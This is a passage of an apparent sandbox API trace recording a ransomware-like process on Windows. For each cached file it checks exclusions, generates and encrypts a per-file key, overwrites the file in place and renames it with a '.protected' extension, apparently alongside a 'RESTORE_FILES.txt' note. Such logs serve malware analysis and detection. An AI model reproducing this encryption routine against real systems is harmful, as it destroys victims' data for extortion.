halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.533] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned 151 [0087.533] StrStrW (lpFirst="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpSrch=".txt") returned 0x0 
[0087.533] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned 151 [0087.533] StrStrW (lpFirst="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpSrch=".rar") returned 0x0 [0087.533] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned 151 [0087.533] StrStrW (lpFirst="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpSrch=".zip") returned 0x0 [0087.533] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1d8, lpOverlapped=0x0) returned 1 [0087.534] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.534] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1d8, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1d8, lpOverlapped=0x0) returned 1 [0087.534] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.534] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0087.534] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0087.534] CloseHandle (hObject=0x150) returned 1 [0087.535] wnsprintfW (in: 
pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973.protected") returned 161 [0087.535] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973.protected")) returned 1 [0087.535] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.535] lstrcmpiW (lpString1="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpString2="Windows") returned -1 [0087.535] lstrcmpiW (lpString1="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpString2="Program Files") returned -1 [0087.535] lstrcmpiW (lpString1="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpString2="Program Files (x86)") returned -1 [0087.535] lstrcmpiW (lpString1="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpString2="$Recycle.bin") returned 1 [0087.535] lstrcmpiW (lpString1="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpString2="System Volume Information") returned -1 [0087.535] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned 118 [0087.535] StrStrIW (lpFirst="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpSrch=".protected") 
returned 0x0 [0087.535] lstrcmpW (lpString1="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpString2="RESTORE_FILES.txt") returned -1 [0087.535] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.535] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.535] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1daf2884ec4dfa96ba4a58d4dbc9c406"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned 118 [0087.628] StrStrW (lpFirst="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpSrch=".txt") returned 0x0 [0087.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned 118 [0087.628] StrStrW (lpFirst="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpSrch=".rar") returned 0x0 [0087.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned 118 [0087.628] StrStrW (lpFirst="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpSrch=".zip") returned 0x0 [0087.628] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0xf1d, lpOverlapped=0x0) returned 1 [0087.718] SetFilePointerEx (in: hFile=0x150, 
liDistanceToMove=0xfffff0e3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.718] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xf1d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0xf1d, lpOverlapped=0x0) returned 1 [0087.718] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.718] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0087.718] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0087.718] CloseHandle (hObject=0x150) returned 1 [0087.718] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406.protected") returned 128 [0087.718] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1daf2884ec4dfa96ba4a58d4dbc9c406"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1daf2884ec4dfa96ba4a58d4dbc9c406.protected")) returned 1 [0087.719] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: 
lpFindFileData=0x295e7d0) returned 1 [0087.719] lstrcmpiW (lpString1="23B523C9E7746F715D33C6527C18EB9D", lpString2="Windows") returned -1 [0087.719] lstrcmpiW (lpString1="23B523C9E7746F715D33C6527C18EB9D", lpString2="Program Files") returned -1 [0087.719] lstrcmpiW (lpString1="23B523C9E7746F715D33C6527C18EB9D", lpString2="Program Files (x86)") returned -1 [0087.719] lstrcmpiW (lpString1="23B523C9E7746F715D33C6527C18EB9D", lpString2="$Recycle.bin") returned 1 [0087.719] lstrcmpiW (lpString1="23B523C9E7746F715D33C6527C18EB9D", lpString2="System Volume Information") returned -1 [0087.719] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D") returned 118 [0087.719] StrStrIW (lpFirst="23B523C9E7746F715D33C6527C18EB9D", lpSrch=".protected") returned 0x0 [0087.719] lstrcmpW (lpString1="23B523C9E7746F715D33C6527C18EB9D", lpString2="RESTORE_FILES.txt") returned -1 [0087.719] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.719] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.719] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\23b523c9e7746f715d33c6527c18eb9d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.720] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D") returned 118 [0087.720] 
StrStrW (lpFirst="23B523C9E7746F715D33C6527C18EB9D", lpSrch=".txt") returned 0x0 [0087.720] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D") returned 118 [0087.720] StrStrW (lpFirst="23B523C9E7746F715D33C6527C18EB9D", lpSrch=".rar") returned 0x0 [0087.720] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D") returned 118 [0087.720] StrStrW (lpFirst="23B523C9E7746F715D33C6527C18EB9D", lpSrch=".zip") returned 0x0 [0087.720] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x145, lpOverlapped=0x0) returned 1 [0087.721] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffebb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.721] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x145, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x145, lpOverlapped=0x0) returned 1 [0087.721] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.721] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0087.721] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0087.721] CloseHandle (hObject=0x150) returned 1 [0087.722] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D.protected") returned 128 [0087.722] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\23b523c9e7746f715d33c6527c18eb9d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\23b523c9e7746f715d33c6527c18eb9d.protected")) returned 1 [0087.722] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.722] lstrcmpiW (lpString1="3130B1871A126520A8C47861EFE3ED4D", lpString2="Windows") returned -1 [0087.722] lstrcmpiW (lpString1="3130B1871A126520A8C47861EFE3ED4D", lpString2="Program Files") returned -1 [0087.722] lstrcmpiW (lpString1="3130B1871A126520A8C47861EFE3ED4D", lpString2="Program Files (x86)") returned -1 [0087.725] lstrcmpiW (lpString1="3130B1871A126520A8C47861EFE3ED4D", lpString2="$Recycle.bin") returned 1 [0087.725] lstrcmpiW (lpString1="3130B1871A126520A8C47861EFE3ED4D", lpString2="System Volume Information") returned -1 [0087.725] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D") returned 118 [0087.725] StrStrIW (lpFirst="3130B1871A126520A8C47861EFE3ED4D", lpSrch=".protected") returned 0x0 [0087.725] lstrcmpW (lpString1="3130B1871A126520A8C47861EFE3ED4D", lpString2="RESTORE_FILES.txt") returned -1 [0087.725] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: 
pbBuffer=0x295e76c) returned 1 [0087.725] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.725] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3130b1871a126520a8c47861efe3ed4d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.726] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D") returned 118 [0087.726] StrStrW (lpFirst="3130B1871A126520A8C47861EFE3ED4D", lpSrch=".txt") returned 0x0 [0087.726] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D") returned 118 [0087.726] StrStrW (lpFirst="3130B1871A126520A8C47861EFE3ED4D", lpSrch=".rar") returned 0x0 [0087.729] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D") returned 118 [0087.729] StrStrW (lpFirst="3130B1871A126520A8C47861EFE3ED4D", lpSrch=".zip") returned 0x0 [0087.729] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x209, lpOverlapped=0x0) returned 1 [0087.730] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffdf7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.730] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x209, 
lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x209, lpOverlapped=0x0) returned 1 [0087.730] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.730] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0087.730] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0087.730] CloseHandle (hObject=0x150) returned 1 [0087.730] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D.protected") returned 128 [0087.730] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3130b1871a126520a8c47861efe3ed4d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3130b1871a126520a8c47861efe3ed4d.protected")) returned 1 [0087.731] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.731] lstrcmpiW (lpString1="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpString2="Windows") returned -1 [0087.731] lstrcmpiW 
(lpString1="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpString2="Program Files") returned -1 [0087.731] lstrcmpiW (lpString1="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpString2="Program Files (x86)") returned -1 [0087.731] lstrcmpiW (lpString1="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpString2="$Recycle.bin") returned 1 [0087.732] lstrcmpiW (lpString1="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpString2="System Volume Information") returned -1 [0087.732] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned 151 [0087.732] StrStrIW (lpFirst="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpSrch=".protected") returned 0x0 [0087.732] lstrcmpW (lpString1="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpString2="RESTORE_FILES.txt") returned -1 [0087.732] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.732] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.732] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.732] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned 151 [0087.732] StrStrW (lpFirst="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpSrch=".txt") returned 0x0 [0087.733] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned 151 [0087.733] StrStrW (lpFirst="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpSrch=".rar") returned 0x0 [0087.733] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned 151 [0087.733] StrStrW (lpFirst="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpSrch=".zip") returned 0x0 [0087.733] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x58b, lpOverlapped=0x0) returned 1 [0087.734] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa75, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.734] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x58b, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x58b, lpOverlapped=0x0) returned 1 [0087.734] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.734] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 
[0087.734] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0087.734] CloseHandle (hObject=0x150) returned 1 [0087.734] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D.protected") returned 161 [0087.734] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D.protected" (normalized: "c:\\users\\5p5nrgjn0js 